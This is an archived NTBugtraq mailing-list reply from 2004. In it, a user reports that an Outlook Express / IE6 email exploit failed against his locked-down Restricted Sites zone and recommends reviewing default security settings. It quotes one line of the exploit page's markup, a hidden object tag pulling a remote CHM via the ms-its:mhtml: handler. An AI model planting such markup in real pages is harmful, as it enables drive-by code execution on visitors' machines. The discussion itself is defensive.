Re: NOT GOOD: Outlook Express 6 + Internet Explorer 6

From: Fish (fish_at_INFIDELS.ORG)
Date: 04/02/04

  • Next message: Benny Teh (M_IT Ops): "Suspicious WebDAV Traffic"
    Date:         Fri, 2 Apr 2004 00:56:50 -0800
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    <snip>
    > This also works just fine on Outlook 2003 in default
    > configuration with Exchange Outlook Security Template
    > with IE 6.x fully patched. Suspect earlier versions
    > of Outlook work also.
    <snip>

    Not on my system running Outlook 98 it doesn't. <shrug>

    But then again, my Restricted Sites security zone isn't using the
    default settings either. ;-)

    I honestly don't understand why so many people trust "default"
    settings -- especially default SECURITY settings.

    I have my Restricted Sites zone configured with everything set to
    'Disable'. Double-clicking the exploit .eml file launches Outlook
    Express on my system even though I have my system configured to use
    Outlook as my email client and not Outlook Express -- go figure.
    <shrug> I guess Windows/Internet Explorer ignores your preferences
    and uses your file type (file extensions) associations instead
    <shrug>.

    Anyway, Outlook Express launches and the exploit email (form?)
    appears with the link highlighted. I click on the link and
    immediately get a "Security Alert" popup dialog informing me:

      "Your current security settings do not allow you to send HTML
    forms."

    So I don't think the exploit worked. :)

    I then opened the exploit .eml file in notepad and copy & pasted the
    URL from there (http://www.malware.com/t-bill.html) into the address
    bar of Internet Explorer, and guess what?

    A completely blank page. :)

    Viewing the source to this page reveals the following:

      <xbject
    data="ms-its:mhtml:file://C:\foo.mhtml!http://www.malware.com//bad.chm
    ::/foo.html" type="text/x-scriptlet" style="visibility:hidden">

    Note that the above tag ("xbject") appears EXACTLY as you see it:
    "xbject" and NOT "object" as one might at first suspect. That is
    because: 1) my Internet Explorer is configured to use my AdCruncher
    Proxy as an HTTP proxy, and 2) my AdCruncher Proxy filtering plugin
    is configured to automatically disable all malware type exploits
    (scripts, objects, embedded, etc) for all sites that I "do not trust"
    (which is ALL sites by default).

    So.... what does all this mean?

    Well, what it means to ME is:

    1. One should not trust "default" security settings and instead to
    manually review and modify/set them according to your OWN standards.

    2. AdCruncher Proxy[1] -- with its ability to disable any/all
    scripting on any/all web sites/pages desired -- has once again proven
    itself to be a valuable extra layer of protection against HTTP based
    exploits.

    - --
    "Fish" (David B. Trout)
       fish@infidels.org

    Fight Spam! Join CAUCE!
    http://www.cauce.org/

    [1] http://home.sprintmail.com/~dtrout/AdCruncher/ReadMe.html

    It still needs a LOT of work (and I'm currently in the process of
    trying to get that [much needed] work done too -- along with a LOT of
    other work besides), as does the default plugin filtering DLL too,
    but even in its current state it's *still* (IMO) a halfway decent
    product. <shrug> But then, I'm biased I guess. ;-)

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.0.4

    iQA/AwUBQG0q0Ej11/TE7j4qEQK/tgCgjge51pdH0dKzg5Lrv/DHOEmn/TMAoMIS
    EfecuZmb40Sbo8hVUmXWLSTe
    =wJ4P
    -----END PGP SIGNATURE-----

    -----
    NTBugtraq Editor's Note:

    Wondering how to unsubscribe from NTBugtraq? Just send a message to Listserv@listserv.ntbugtraq.com with unsubscribe ntbugtraq in the message body, you don't need a subject line. If it says you aren't subscribed, you've either subscribed with a different email address or your address has changed somehow. Just email Russ.Cooper@rc.on.ca and I'll remove you.
    -----


  • Next message: Benny Teh (M_IT Ops): "Suspicious WebDAV Traffic"

    Relevant Pages

    • Re: Spamnet add-in to Outlook
      ... If you're modifying the security settings item (you should never be ... Outlook may not save the change to the member list. ... I agree that setting up the Outlook Security Template and not ...
      (microsoft.public.outlook.program_addins)
    • Re: Local admin restricted from IISRESET
      ... >> administrator to see if that helps. ... >> resetting security settings back to default defined levels, ... Running Security Configuration and Analysis mmc ...
      (microsoft.public.win2000.security)
    • Re: Spamnet add-in to Outlook
      ... Sue Mosher, Outlook MVP ... > I just went to create a new security item (added members in an Exception ... >> If you're modifying the security settings item (you should never be ...
      (microsoft.public.outlook.program_addins)
    • Re: MailMerge and Outlook Security Warning
      ... > We had this issue before and were able to give our customers a workaround ... The work around was to use the Outlook Security ... > template and customizing the security settings for particular users. ...
      (microsoft.public.word.mailmerge.fields)
    • Re: enable outlook security.oft to allow programs to send email wi
      ... there is a limit to how many addresses you can specify for "Security Settings ... > items in the Outlook Security Settings folder, ... >> Exchange server you are running against is an Exchange ...
      (microsoft.public.outlook.program_forms)